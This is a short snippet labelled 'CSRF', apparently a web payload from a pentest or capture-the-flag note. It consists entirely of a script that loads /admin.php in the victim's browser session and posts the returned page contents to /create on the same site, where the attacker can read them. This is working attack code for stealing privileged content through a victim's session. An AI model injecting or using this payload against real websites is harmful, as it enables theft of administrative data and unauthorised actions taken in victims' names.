CSRF

<script>
    var req = new XMLHttpRequest();
    req.onload = handleResponse;
    req.open('get','/admin.php',true);
    req.send();
    function handleResponse() {
    var page = this.responseText;
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/create', true);
    changeReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    changeReq.send('title=Adminpage&body=' + page);
};
</script>